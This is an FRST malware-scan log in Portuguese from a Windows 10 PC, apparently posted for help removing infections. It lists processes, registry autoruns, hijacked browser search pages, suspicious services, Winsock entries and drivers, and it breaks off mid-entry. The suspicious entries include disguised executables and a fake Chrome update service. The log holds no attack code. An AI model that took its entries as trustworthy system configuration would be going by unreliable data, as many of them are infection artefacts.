cjoint

Commentaire : Resultado do exame da Farbar Recovery Scan Tool (FRST) (x64) Versão:07-02-2016 Executado por Maollo (administrador) em MAOLLO-PC (11-02-2016 11:29:36) Executando a partir de C:\Users\Maollo\Downloads Perfis Carregados: Maollo (Perfis Disponíveis: Maollo & DefaultAppPool) Platform: Windows 10 Pro Versão 1511 (X64) Idioma: Português (Brasil) Internet Explorer Versão 11 (Navegador padrão: Chrome) Modo da Inicialização: Normal Tutorial da Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processos (Whitelisted) ================= (Se uma entrada for incluída na fixlist, o processo será fechado. O arquivo não será movido.) (QIHU 360 SOFTWARE CO. LIMITED) C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe (DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe (Qihu Software Co. Limited) C:\Program Files (x86)\360\Total Security\safemon\QHWatchdog.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (DotC United Inc) C:\Program Files (x86)\MPC Cleaner\MPCTray.exe (QIHU 360 SOFTWARE CO. LIMITED) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () C:\Riot Games\League of Legends\RADS\projects\lol_launcher\releases\0.0.1.10\deploy\LoLLauncher.exe () C:\Riot Games\League of Legends\RADS\projects\lol_patcher\releases\0.0.0.50\deploy\LoLPatcher.exe () C:\Riot Games\League of Legends\RADS\projects\lol_air_client\releases\0.0.1.186\deploy\LolClient.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) 
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () C:\Program Files (x86)\Primary Color\updatePrimaryColor.exe () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe () C:\Windows\nci.exe () C:\Windows\mnci.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe () C:\Program Files (x86)\Primary Color\bin\utilPrimaryColor.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.expext.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.expext.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.PurBrowse64.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter64.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter.exe () C:\Program Files (x86)\Primary Color\bin\PrimaryColor.BrowserAdapter64.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () C:\Program Files (x86)\360\Total Security\LiveUpdate360.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe ==================== Registro (Whitelisted) =========================== (Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido. O arquivo não será movido.) HKLM-x32\...\Run: [QHSafeTray] => C:\Program Files (x86)\360\Total Security\safemon\360Tray.exe [305272 2015-12-11] (QIHU 360 SOFTWARE CO. 
LIMITED) HKLM-x32\...\Run: [LightGate] => c:\programdata\21383\lightgate.exe [1081344 2015-12-04] () HKLM-x32\...\Run: [HomePageHelper] => c:\programdata\11973\homepage.exe [1100288 2015-11-25] () HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation) HKLM-x32\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [-] => C:\ProgramData\00781\msiql.exe [2412032 2016-01-14] () HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [taskhost] => rundll32.exe C:\ProgramData\WindowsMsg\675D131108D4FD145B0BFBC68A3E018A.dll Start /DEFAULT HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [Pritc] => c:\programdata\windows update\tmp\msdtc-.exe [2980352 2016-01-08] (VLOME) HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\osmsg.exe [1905664 2016-01-16] () HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Run: [msiql] => C:\ProgramData\04200\msiql.exe [2415616 2016-01-26] () HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-18\...\Run: [SPDriver] => C:\Program Files (x86)\ShopperPro3\JSDriver\1.42.1.10638\jsdrv.exe HKU\S-1-5-18\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKU\S-1-5-18\...\Run: [Gameo] => C:\WINDOWS\system32\config\systemprofile\AppData\Roaming\Gameo\gameo.exe "C:\WINDOWS\system32\config\systemprofile\AppData\Roaming\Gameo\gameo.dat" mode:minimized HKU\S-1-5-18\...\Run: [Pritc] => c:\programdata\windows update\tmp\msdtc-.exe [2980352 2016-01-08] (VLOME) GroupPolicy: Restrição - Chrome <======= ATENÇÃO CHR HKLM\SOFTWARE\Policies\Google: Restrição <======= ATENÇÃO ==================== Internet (Whitelisted) ==================== (Se um ítem for incluído na fixlist, sendo um ítem do Registro, será removido ou 
restaurado para o padrão.) Winsock: Catalog9-x64 01 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Winsock: Catalog9-x64 02 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Winsock: Catalog9-x64 03 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Winsock: Catalog9-x64 04 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Winsock: Catalog9-x64 05 C:\Windows\system32\Dileiho64.dll [768352 2015-12-31] () Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{53c83f7d-ebc0-4abe-a10d-aa15a56f967f}: [DhcpNameServer] 192.168.1.1 Tcpip\..\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}: [NameServer] 104.197.191.4 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restrição <======= ATENÇÃO HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=da476c53914445094825b50d4d435dd6 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=da476c53914445094825b50d4d435dd6 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = search.mpc.am HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mystart.com/?pr=vmn&id=mystarttb&v=5_5&ent=hp_5153&src=5153 HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://br.hao123.com/?tn=sdkc_inner_hp_09_hao123_br&guid=da476c53914445094825b50d4d435dd6 SearchScopes: HKLM -> DefaultScope {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8KBAATFgZAbVoJAlpcFVYbdhRaUQ9HDAYQIgEIVA1FRwQXdR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms} SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?hl={language}&q={searchTerms} SearchScopes: HKLM -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = 
hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8KBAATFgZAbVoJAlpcFVYbdhRaUQ9HDAYQIgEIVA1FRwQXdR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://www.google.com/search?hl={language}&q={searchTerms} SearchScopes: HKLM-x32 -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://www.google.com/search?hl={language}&q={searchTerms} SearchScopes: HKU\.DEFAULT -> DefaultScope {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://www.mystart.com/results.php?gen=ms&pr=vmn&id=mystarttb&v=5_5&ent=ch_5153&q={searchTerms} SearchScopes: HKU\.DEFAULT -> {3BD44F0E-0596-4008-AEE0-45D47E3A8F0E} URL = hxxp://www.mystart.com/results.php?gen=ms&pr=vmn&id=mystarttb&v=5_5&ent=ch_5153&q={searchTerms} SearchScopes: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001 -> DefaultScope {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8KBAATFgZAbVoJAlpcFVYbdhRaUQ9HDAYQIgEIVA1FRwQXdR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms} SearchScopes: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001 -> OldSearch URL = hxxp://www.google.com/search?hl={language}&q={searchTerms} SearchScopes: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001 -> {59E9C8B1-74FD-4CB6-A815-9E96102F97BD} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8KBAATFgZAbVoJAlpcFVYbdhRaUQ9HDAYQIgEIVA1FRwQXdR9aFQQTSEcFME0FCFwEURNNfWpdAEsSSX5NL04=&q={searchTerms} SearchScopes: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001 -> {811C5DC1-F05B-4D62-AE1F-5520656C288C} URL = hxxps://br.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=435371&p={searchTerms} BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation) BHO: SafeMon Class -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> C:\Program 
Files (x86)\360\Total Security\safemon\safemon64.dll [2015-12-11] (Qihu 360 Software Co., Ltd.) BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\ssv.dll [2016-01-30] (Oracle Corporation) BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation) BHO-x32: Primary Color 1.0.0.7 -> {b0a28f54-b08f-4049-a9bf-8d33bd1e9222} -> C:\Program Files (x86)\Primary Color\PrimaryColorbho.dll [2015-12-21] (Primary Color) BHO-x32: PriceFountain -> {b608cc98-54de-4775-96c9-097de398500c} -> C:\WINDOWS\SysWow64\config\systemprofile\AppData\Local\PriceFountain\PriceFountainIE.dll [2015-06-18] () BHO-x32: SafeMon Class -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> C:\Program Files (x86)\360\Total Security\safemon\safemon.dll [2015-12-11] (Qihu 360 Software Co., Ltd.) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-30] (Oracle Corporation) Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation) Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation) FireFox: ======== FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-10-20] () FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-10-20] () FF Plugin-x32: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-30] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files 
(x86)\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-30] (Oracle Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-17] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-17] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-03] (Google Inc.) FF HKLM\...\Firefox\Extensions: [{71D41604-39D5-4834-8377-4BF8AFDE7499}] - C:\Program Files\shopperz311220151509\Firefox\{71D41604-39D5-4834-8377-4BF8AFDE7499}.xpi => não encontrado (a) FF HKLM\...\Firefox\Extensions: [{2C45C02C-9AC2-4650-80D9-BDB75E0BF02B}] - C:\Program Files\groover040120161227\Firefox\{2C45C02C-9AC2-4650-80D9-BDB75E0BF02B}.xpi => não encontrado (a) FF HKLM-x32\...\Firefox\Extensions: [{71D41604-39D5-4834-8377-4BF8AFDE7499}] - C:\Program Files\shopperz311220151509\Firefox\{71D41604-39D5-4834-8377-4BF8AFDE7499}.xpi => não encontrado (a) FF HKLM-x32\...\Firefox\Extensions: [{2C45C02C-9AC2-4650-80D9-BDB75E0BF02B}] - C:\Program Files\groover040120161227\Firefox\{2C45C02C-9AC2-4650-80D9-BDB75E0BF02B}.xpi => não encontrado (a) Chrome: ======= CHR DefaultSearchURL: Default -> hxxps://mystart.com/default-search/rsc001__moss__org103__103_55f20019a6fde1d80a7b23c6__2_4_5__moc__nt__yr/?q={searchTerms} CHR DefaultSearchKeyword: Default -> yahoo CHR Profile: C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Apresentações) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-04] CHR Extension: (Google Docs) - C:\Users\Maollo\AppData\Local\Google\Chrome\User 
Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-04] CHR Extension: (Google Drive) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-04] CHR Extension: (YouTube) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-04] CHR Extension: (Google Search) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-04] CHR Extension: (Planilhas do Google) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-04] CHR Extension: (Documentos Google off-line) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-02-04] CHR Extension: (Skype) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-02-04] CHR Extension: (Pagamentos da Chrome Web Store) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-02-04] CHR Extension: (Gmail) - C:\Users\Maollo\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-04] CHR HKLM-x32\...\Chrome\Extension: [ijepgjdjkdbopbnaopmlmobimmhjklhd] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12] ==================== Serviços (Whitelisted) ======================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) S3 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [437880 2015-10-08] (BlueStack Systems, Inc.) 
S2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [417400 2015-10-08] (BlueStack Systems, Inc.) S3 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [855672 2015-10-08] (BlueStack Systems, Inc.) S3 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation) S3 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation) S3 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1155192 2015-08-26] (NVIDIA Corporation) S2 GoogleChromeUpService; C:\ProgramData\upgsvr.exe [1747968 2015-12-28] () [Arquivo não assinado] S2 GoogleChromeUpSvc; C:\ProgramData\Windows Update\svrupg.exe [2786816 2016-01-17] (TODO: ) [Arquivo não assinado] S3 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [24888 2015-07-26] (Hewlett-Packard Company) R2 mnci; c:\windows\mnci.exe [408576 2016-02-03] () [Arquivo não assinado] R2 MPCProtectService; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [349152 2016-01-28] (DotC United Inc) S2 MustangService_2015_10_10; C:\ProgramData\TempMoudleSet\MustangSer2033.exe [235776 2015-12-15] (MustangService) R2 nci; c:\windows\nci.exe [417792 2016-02-03] () [Arquivo não assinado] S3 npggsvc; C:\WINDOWS\SysWOW64\GameMon.des [3758336 2015-11-29] (INCA Internet Co., Ltd.) 
S3 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1873696 2015-10-12] (NVIDIA Corporation) S2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [5544568 2015-08-26] (NVIDIA Corporation) S3 OverwolfUpdater; C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe [1009392 2016-01-20] (Overwolf LTD) R2 QHActiveDefense; C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe [903288 2015-12-11] (QIHU 360 SOFTWARE CO. LIMITED) S3 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-11-04] () S2 TheCalendarService; C:\Program Files (x86)\CalendarTool\2.0.0.11189\CalendarServ.exe [141960 2015-12-25] () R2 Update Primary Color; C:\Program Files (x86)\Primary Color\updatePrimaryColor.exe [662952 2016-02-11] () S2 update_service; C:\Program Files (x86)\updateservice\updateservice.exe [23552 2016-01-20] () [Arquivo não assinado] R2 Util Primary Color; C:\Program Files (x86)\Primary Color\bin\utilPrimaryColor.exe [662952 2016-02-11] () S2 VIAKaraokeService; C:\Windows\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies, Inc.) S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation) S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation) ===================== Drivers (Whitelisted) ========================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) 
S3 360AntiHacker; C:\Windows\System32\Drivers\360AntiHacker64.sys [137808 2015-11-12] (360.cn) R3 360AvFlt; C:\Windows\System32\DRIVERS\360AvFlt.sys [77904 2015-12-11] (360.cn) R3 360AvFlt; C:\Windows\SysWOW64\DRIVERS\360AvFlt.sys [77904 2015-12-11] (360.cn) R1 360Box64; C:\Windows\System32\DRIVERS\360Box64.sys [319568 2015-12-11] (360.cn) S3 360Camera; C:\Windows\System32\Drivers\360Camera64.sys [40520 2015-11-12] (360.cn) R1 360FsFlt; C:\Windows\System32\DRIVERS\360FsFlt.sys [367696 2015-11-12] (360.cn) R1 BAPIDRV; C:\Windows\System32\DRIVERS\BAPIDRV64.sys [181328 2015-12-11] (360.cn) S2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [146040 2015-10-08] (BlueStack Systems) R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-01-18] (DotC United Inc) R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19576 2015-08-26] (NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [50472 2015-08-11] (NVIDIA Corporation) R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek ) R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [37184 2015-09-22] (Razer, Inc.) R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [130880 2015-12-14] (Razer, Inc.) 
S3 tsusbhub; C:\Windows\System32\drivers\tsusbhub.sys [117248 2010-11-20] (Microsoft Corporation) [Arquivo não assinado] S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation) S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation) S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation) R1 {0da991e7-651e-44f2-a8d8-99c28d929208}Gw64; C:\Windows\System32\drivers\{0da991e7-651e-44f2-a8d8-99c28d929208}Gw64.sys [48456 2016-02-09] (StdLib) R1 {10593385-12ca-4697-8245-47ada7c055d9}Gw64; C:\Windows\System32\drivers\{10593385-12ca-4697-8245-47ada7c055d9}Gw64.sys [48456 2016-01-27] (StdLib) R1 {14399205-100e-435b-93e2-9f4ebefe8918}Gw64; C:\Windows\System32\drivers\{14399205-100e-435b-93e2-9f4ebefe8918}Gw64.sys [48456 2016-01-28] (StdLib) R1 {54e9b4e5-84c4-42a5-a254-fd1f8319fc98}Gw64; C:\Windows\System32\drivers\{54e9b4e5-84c4-42a5-a254-fd1f8319fc98}Gw64.sys [48456 2016-02-06] (StdLib) R1 {5e399338-5cac-41fc-91a7-455ee6632d3f}Gw64; C:\Windows\System32\drivers\{5e399338-5cac-41fc-91a7-455ee6632d3f}Gw64.sys [48456 2016-02-05] (StdLib) U3 idsvc; não ImagePath U3 wpcsvc; não ImagePath ==================== NetSvcs (Whitelisted) =================== (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.) ==================== Um Mês Criados arquivos e pastas ======== (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.) 
2016-02-11 11:29 - 2016-02-11 11:30 - 00021467 _____ C:\Users\Maollo\Downloads\FRST.txt 2016-02-11 11:29 - 2016-02-11 11:29 - 00000000 ____D C:\FRST 2016-02-11 11:28 - 2016-02-11 11:28 - 02370560 _____ (Farbar) C:\Users\Maollo\Downloads\FRST64.exe 2016-02-11 10:31 - 2016-02-11 10:31 - 00000000 ____D C:\Users\Todos os Usuários\NortonInstaller 2016-02-11 10:31 - 2016-02-11 10:31 - 00000000 ____D C:\ProgramData\NortonInstaller 2016-02-11 10:23 - 2016-02-11 10:28 - 00000000 ____D C:\Program Files (x86)\YTDownloader 2016-02-11 10:22 - 2016-02-11 10:22 - 00000000 ____D C:\Program Files (x86)\ShopperPro3 2016-02-11 10:22 - 2016-02-11 10:22 - 00000000 ____D C:\Program Files (x86)\MixVideoPlayer 2016-02-11 10:21 - 2016-02-11 10:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC 2016-02-11 10:20 - 2016-02-11 10:21 - 00000000 ____D C:\Users\Todos os Usuários\11973 2016-02-11 10:20 - 2016-02-11 10:21 - 00000000 ____D C:\ProgramData\11973 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\Users\Todos os Usuários\21383 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\Users\Todos os Usuários\18769 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\ProgramData\21383 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\ProgramData\18769 2016-02-11 10:20 - 2016-02-11 10:20 - 00000000 ____D C:\Program Files (x86)\CalendarTool 2016-02-11 10:19 - 2016-02-11 10:20 - 00000000 ____D C:\Users\Todos os Usuários\23996 2016-02-11 10:19 - 2016-02-11 10:20 - 00000000 ____D C:\ProgramData\23996 2016-02-10 10:17 - 2016-01-27 03:56 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2016-02-10 10:17 - 2016-01-27 03:55 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2016-02-10 10:17 - 2016-01-27 03:45 - 06605544 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll 2016-02-10 10:17 - 2016-01-27 03:37 - 01998176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 
2016-02-10 10:17 - 2016-01-27 03:10 - 22394368 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2016-02-10 10:17 - 2016-01-27 03:05 - 19339776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-02-10 10:17 - 2016-01-27 03:05 - 18678272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2016-02-10 10:17 - 2016-01-27 03:04 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2016-02-10 10:17 - 2016-01-27 02:58 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2016-02-10 10:17 - 2016-01-27 02:55 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-02-10 10:17 - 2016-01-27 02:54 - 24603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-02-10 10:17 - 2016-01-27 02:48 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-02-10 10:17 - 2016-01-27 02:41 - 03592704 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2016-02-10 10:16 - 2016-01-29 04:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2016-02-10 10:16 - 2016-01-29 04:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2016-02-10 10:16 - 2016-01-27 04:15 - 01557776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2016-02-10 10:16 - 2016-01-27 04:15 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2016-02-10 10:16 - 2016-01-27 04:01 - 07476064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2016-02-10 10:16 - 2016-01-27 04:01 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2016-02-10 10:16 - 2016-01-27 04:01 - 01819720 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2016-02-10 10:16 - 2016-01-27 03:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe 2016-02-10 10:16 - 2016-01-27 03:57 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-02-10 10:16 - 2016-01-27 03:57 
